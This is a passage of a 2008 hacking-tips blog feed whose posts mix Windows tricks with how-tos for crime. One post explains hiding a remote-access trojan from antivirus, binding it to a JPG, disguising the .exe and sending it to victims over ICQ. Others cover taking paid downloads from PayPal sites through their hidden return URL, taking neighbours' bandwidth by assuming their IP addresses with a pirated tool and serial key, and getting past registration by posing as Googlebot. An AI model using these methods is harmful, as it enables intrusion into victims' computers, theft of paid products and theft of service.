href="http://amazon.com/gp/product/B0001A2228?ie=UTF8&amp;amp;tag=bestwindowstr-20&amp;amp;link_code=em1&amp;amp;camp=212341&amp;amp;creative=384049&amp;amp;creativeASIN=B0001A2228&amp;amp;adid=11018ac1-eaf8-442e-b8c7-f48c32834bf2"&gt;&lt;/a&gt;of the site in an a texteditor&lt;br /&gt;2) Search for the word "return"&lt;br /&gt;3) Next to it you can find the url for the thank you page&lt;br /&gt;4) Copy the url and paste it in your browser and you will see the download link&lt;br /&gt;&lt;br /&gt;This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.&lt;br /&gt;&lt;br /&gt;You can try it here to start with:&lt;br /&gt;Code:&lt;br /&gt;http://www.ramphelp.com/halfpipe.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;About half way down the page you will find:&lt; type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912h&lt;br /&gt;p654/26865thankyouhp08363215423.html "&gt;&lt;br /&gt;&lt;br /&gt;Copy the link into your browser and download.&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-7392220659626743814?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/7392220659626743814/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=7392220659626743814' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7392220659626743814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7392220659626743814'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hack-those-sites-which-link-with-paypal.html' title='hack those sites which link with PAYPAL- education purpose only'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3010755699809632407</id><published>2008-08-26T12:10:00.000-07:00</published><updated>2008-08-26T12:12:11.395-07:00</updated><title type='text'>Make trojan unditectable!!</title><content type='html'>&lt;pre&gt;This trick works only by sending a picture to someone on ICQ.&lt;br /&gt;How to make this work?&lt;br /&gt;&lt;br /&gt;1  Find a small Trojan. Best not detected by AVP.&lt;br /&gt;2  Find a binder that can bind a JPG to an exe. Best not detected by AVP.&lt;br /&gt;3  Rename the result file and change the icon.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 First you must find a small Trojan to bind to the picture.&lt;br /&gt; That way the size will not be too big and the receiver won`t get suspicious by long&lt;br /&gt; downloading times or big picture sizes.&lt;br /&gt;&lt;br /&gt; The best is to use a small Trojan with ICQ notify.&lt;br /&gt; Then you get a notify on ICQ with IP address.&lt;br /&gt; You need that to connect and to upload another Trojan that has more functions.&lt;br /&gt; Many of them are out there:&lt;br /&gt; MiniCommand 1.2, FC`s InCommand, Slim`s Asylum and Webasylum, WWWPW.&lt;br /&gt; There are lots of them, and new ones getting available every day. Try to get an unpacked server,&lt;br /&gt; so you can pack the server.&lt;br /&gt; If the server is packed, it is harder for antivirus programs to detect it.&lt;br /&gt; Edit the server.&lt;br /&gt;&lt;br /&gt; Then test the server on your own computer, to see if you get an ICQ pager.&lt;br /&gt; Make this work. Else edit the server again. Do not forget to remove the server afterwards.&lt;br /&gt; You can do this by connecting to 127.0.0.1, your own IP.&lt;br /&gt; Then give the command: "remove server".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; To prevent recognition of antivirus programs you should then pack the server.&lt;br /&gt; Use an exe packer or compressor for that.  A lot of packers you can find on the net.&lt;br /&gt; At &lt;a href="http://www.megasecurity.org/Packers.html"&gt;Here&lt;/a&gt; you'll find some.&lt;br /&gt; But the AVP also uses unpackers, so find one that is not so familiar.&lt;br /&gt; A list of what AVP recognizes of Trojans and what kind of decompressing it does,&lt;br /&gt; can be find &lt;a href="http://www.megasecurity.org/Avp_updates.html"&gt;here&lt;/a&gt;.&lt;br /&gt; Then you should test the server for AVP recognition.&lt;br /&gt; If AVP recognizes the server, you should try another packer, or another Trojan server.&lt;br /&gt;&lt;br /&gt;2 The goal is that the victim sees the picture and&lt;br /&gt; that the server is secretly executed at the same time.&lt;br /&gt; To make one file of the server and the JPG, you use a "exe binder" or "joiner".&lt;br /&gt; These ones are also recognized by AVP. So it is important to find one that is not detected.&lt;br /&gt; Take a new one and try it out with AVP.&lt;br /&gt; Binders you can find at &lt;a href="http://www.megasecurity.org/Binders.html"&gt;here&lt;/a&gt;.&lt;br /&gt; Not all binders do bind a JPG to an exe, so find the right one.&lt;br /&gt;&lt;br /&gt;3 Next step is to make the result look like a JPG when you send it by ICQ.&lt;br /&gt; With some binders you can change the icon. Else you can use Microangelo to edit the icon.&lt;br /&gt; You can get that at download.com.&lt;br /&gt; Last step is to make the .exe disappear.&lt;br /&gt; You can do that by renaming the result to "me.in.the.car.without.wearing.a.bra.exe"&lt;br /&gt; That way the name is too long to see the "exe".&lt;br /&gt; Or rename the result like this: Mypic.jpg                    .exe&lt;br /&gt; Put so many spaces between jpg and exe, so that the exe does not show up when you send the file.&lt;br /&gt;&lt;br /&gt; When you get the notify you have remote control.&lt;br /&gt; Remove the result.exe and upload the normal JPG instead.&lt;br /&gt; Removing your traces a little.&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3010755699809632407?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3010755699809632407/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3010755699809632407' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3010755699809632407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3010755699809632407'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/make-trojan-unditectable.html' title='Make trojan unditectable!!'/><author><name>Rutwik</name><uri>http://www.blogger.com/profile/10792171320006345850</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1429243279946275812</id><published>2008-08-25T00:18:00.001-07:00</published><updated>2008-08-25T00:18:22.073-07:00</updated><title type='text'>Hack [Sify,Reliance,Others] Speed Upto 10 MBPS [Beam Cable Hack]</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/hack-sifyrelianceothers-speed-upto-10.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;First Download this ETHERNET Ip Sniffer called ETHERDETECT&lt;br /&gt;&lt;br /&gt;Use the tool to Scan Ip's in your network&lt;br /&gt;&lt;br /&gt;Keep Scanning till you get some 200 Ip's ..&lt;br /&gt;&lt;br /&gt;Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!&lt;br /&gt;NOTE:Please save your Ip address somewhere so as to get back to your original ip !&lt;br /&gt;&lt;br /&gt;It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.&lt;br /&gt;&lt;br /&gt;Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;..:~Download Link~:..&lt;br /&gt;CODE&lt;br /&gt;&lt;a href="http://rapidshare.com/files/46070425/EtherDetect_setup.exe" target="_blank"&gt;http://rapidshare.com/files/46070425/EtherDetect_setup.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;..:~SERIAL~:..&lt;br /&gt;CODE&lt;br /&gt;YW38X6HKWYT4CTK&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1429243279946275812?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1429243279946275812/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1429243279946275812' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1429243279946275812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1429243279946275812'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hack-sifyrelianceothers-speed-upto-10.html' title='Hack [Sify,Reliance,Others] Speed Upto 10 MBPS [Beam Cable Hack]'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8946069339818506086</id><published>2008-08-25T00:17:00.003-07:00</published><updated>2008-08-25T00:17:40.473-07:00</updated><title type='text'>Watch Any Movie In Paint (100%) Working</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/watch-any-movie-in-paint-100-working.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;* First start a movie in any player.&lt;br /&gt;&lt;br /&gt;* Then open Paint.&lt;br /&gt;&lt;br /&gt;* Now, in the player when the movie is being played, press "Print screen" button on your key board.&lt;br /&gt;&lt;br /&gt;* Now, Press ctrl+v in Paint&lt;br /&gt;&lt;br /&gt;* Leave the movie player open and don't minimize it.&lt;br /&gt;&lt;br /&gt;* Open Paint now and see the movie in the Paint&lt;br /&gt;&lt;br /&gt;*you can edit it also&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8946069339818506086?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8946069339818506086/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8946069339818506086' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8946069339818506086'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8946069339818506086'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/watch-any-movie-in-paint-100-working.html' title='Watch Any Movie In Paint (100%) Working'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1748636988394426390</id><published>2008-08-25T00:17:00.001-07:00</published><updated>2008-08-25T00:17:24.256-07:00</updated><title type='text'>ip locator .......find the location of a ip</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/ip-locator-find-location-of-ip.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;this is a software to find the location of  the ip&lt;br /&gt;&lt;br /&gt;link:&lt;br /&gt;&lt;a href="http://www.4shared.com/file/25808579/5856eca5/iplocator.html" target="_blank"&gt;http://www.4shared.com/file/25808579/5856eca5/iplocator.html&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1748636988394426390?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1748636988394426390/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1748636988394426390' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1748636988394426390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1748636988394426390'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/ip-locator-find-location-of-ip.html' title='ip locator .......find the location of a ip'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5659869067412660225</id><published>2008-08-25T00:16:00.000-07:00</published><updated>2008-08-25T00:17:00.565-07:00</updated><title type='text'>Increasing options in add/remove programs</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/increasing-options-in-addremove.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:&lt;br /&gt;&lt;br /&gt;[Components]&lt;br /&gt;NtComponents=ntoc.dll,NtOcSetupProc,,4&lt;br /&gt;WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7&lt;br /&gt;Display=desk.cpl,DisplayOcSetupProc,,7&lt;br /&gt;Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7&lt;br /&gt;NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7&lt;br /&gt;iis=iis.dll,OcEntry,iis.inf,,7&lt;br /&gt;com=comsetup.dll,OcEntry,comnt5.inf,hide,7&lt;br /&gt;dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7&lt;br /&gt;IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7&lt;br /&gt;TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2&lt;br /&gt;msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6&lt;br /&gt;ims=imsinsnt.dll,OcEntry,ims.inf,,7&lt;br /&gt;fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7&lt;br /&gt;AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7&lt;br /&gt;msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7&lt;br /&gt;RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7&lt;br /&gt;IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7&lt;br /&gt;&lt;br /&gt;This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:&lt;br /&gt;&lt;br /&gt;msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7&lt;br /&gt;&lt;br /&gt;To this:&lt;br /&gt;&lt;br /&gt;msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7&lt;br /&gt;&lt;br /&gt;Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5659869067412660225?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5659869067412660225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5659869067412660225' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5659869067412660225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5659869067412660225'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/increasing-options-in-addremove.html' title='Increasing options in add/remove programs'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3856628938196636606</id><published>2008-08-25T00:15:00.002-07:00</published><updated>2008-08-25T00:16:33.932-07:00</updated><title type='text'>Create a Shortcut to Lock Your Computer</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/create-shortcut-to-lock-your-computer.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3856628938196636606?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3856628938196636606/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3856628938196636606' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3856628938196636606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3856628938196636606'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/create-shortcut-to-lock-your-computer.html' title='Create a Shortcut to Lock Your Computer'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5328737794521501727</id><published>2008-08-25T00:15:00.001-07:00</published><updated>2008-08-25T00:15:20.912-07:00</updated><title type='text'>How to Hide the drives(c:,d:,e:,...etc)</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://hackingnstuff.blogspot.com/2008/03/how-to-hide-drivescdeetc.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;1.Go to start-&gt;run.Type regedit.Now go to:&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&lt;br /&gt;&lt;br /&gt;Now in the right pane&lt;br /&gt;create a new DWORD item and name it NoDrives (it is case sensitive).&lt;br /&gt;Now modify it's value and set it to 3FFFFFF (Hexadecimal) .&lt;br /&gt;Now restart your Computer.&lt;br /&gt;So, now when you click on My Computer, no drives will be shown(all gone...).&lt;br /&gt;&lt;br /&gt;To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your Computer.You can now see all the drives again. Magic.......&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5328737794521501727?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5328737794521501727/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5328737794521501727' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5328737794521501727'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5328737794521501727'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/how-to-hide-drivescdeetc.html' title='How to Hide the drives(c:,d:,e:,...etc)'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4683397201207077221</id><published>2008-08-25T00:13:00.000-07:00</published><updated>2008-08-25T00:14:57.882-07:00</updated><title type='text'>Free Access To Websites Without Registering</title><content type='html'>&lt;p&gt;Go to&lt;br /&gt;&lt;br /&gt;-http://bugmenot.com/&lt;br /&gt;&lt;br /&gt;and type the URL of the website you want to log into.&lt;br /&gt;Examples:&lt;br /&gt;&lt;br /&gt;-http://www.nytimes.com/, -http://www.winnetmag.com/&lt;br /&gt;etcetera.&lt;br /&gt;&lt;br /&gt;Another (and better) way is changing the user agent of your browser to:&lt;br /&gt;Googlebot/2.1+&lt;br /&gt;&lt;br /&gt;-http://www.googlebot.com/bot.html&lt;br /&gt;&lt;br /&gt;This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from&lt;br /&gt;&lt;br /&gt;-http://www.chrispederick.com/work/firefox/useragentswitcher/&lt;br /&gt;and add the Googlebot user agent.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4683397201207077221?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4683397201207077221/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4683397201207077221' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4683397201207077221'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4683397201207077221'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/free-access-to-websites-without.html' title='Free Access To Websites Without Registering'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3543895281625586844</id><published>2008-08-25T00:12:00.000-07:00</published><updated>2008-08-25T00:13:48.175-07:00</updated><title type='text'>chat with command prompt</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; If you want personal chat with a friend&lt;br /&gt;&lt;/h3&gt;   &lt;p&gt;you don't need to download any yahoo messenger&lt;br /&gt;All you need is your friends IP address and Command Prompt.&lt;br /&gt;Firstly, open Notepad and enter:&lt;br /&gt;@echo off&lt;br /&gt;:A&lt;br /&gt;Cls&lt;br /&gt;echo MESSENGER&lt;br /&gt;set /p n=User:&lt;br /&gt;set /p m=Message:&lt;br /&gt;net send %n% %m%&lt;br /&gt;Pause&lt;br /&gt;Goto A&lt;br /&gt;Now save this as "Messenger.bat". Open the .bat file and in Command&lt;br /&gt;Prompt you should see:&lt;br /&gt;MESSENGER&lt;br /&gt;User:&lt;br /&gt;After "User" type the IP address of the computer you want to contact.&lt;br /&gt;After this, you should see this:&lt;br /&gt;Message:&lt;br /&gt;Now type in the message you wish to send.Before you press "Enter" it should look like this:&lt;br /&gt;MESSENGER&lt;br /&gt;User:27.196.391.193&lt;br /&gt;Message: Hi&lt;br /&gt;Now all you need to do is press "Enter", and start chatting!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3543895281625586844?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3543895281625586844/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3543895281625586844' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3543895281625586844'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3543895281625586844'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/chat-with-command-prompt.html' title='chat with command prompt'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4705988640117276705</id><published>2008-08-25T00:11:00.001-07:00</published><updated>2008-08-25T00:11:19.705-07:00</updated><title type='text'>Possible "RUN" commands</title><content type='html'>&lt;h3 class="post-title entry-title"&gt; &lt;a href="http://c-r-u-e-l-t-y.blogspot.com/2008/07/possible-run-commands.html"&gt;Possible "RUN" commands&lt;/a&gt; &lt;/h3&gt;   &lt;p&gt;&lt;span style="font-size: 130%;"&gt;&lt;strong&gt;&lt;em&gt;You can access all these programs by going through START/RUN.&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; SQL Client Configuration - cliconfg&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System Configuration Editor - sysedit&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System Configuration Utility - msconfig&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Scan Immediately)- sfc /scannow&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Scan On Every Boot) - sfc /scanboot&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Return to Default Setting)- sfc /revert&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Purge File Cache)- sfc /purgecache&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System Information - msinfo32.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Task Manager – taskmgr&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; System Properties - sysdm.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; TCP Tester - tcptest&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Telnet Client - telnet&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; User Account Management- nusrmgr.cpl&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Utility Manager - utilman&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Address Book - wab&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Address Book Import Utility - wabmig&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Backup Utility (if installed)- ntbackup&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;--&gt; Windows Explorer - explorer&lt;/em&gt;&lt;/strong&gt;&lt;br 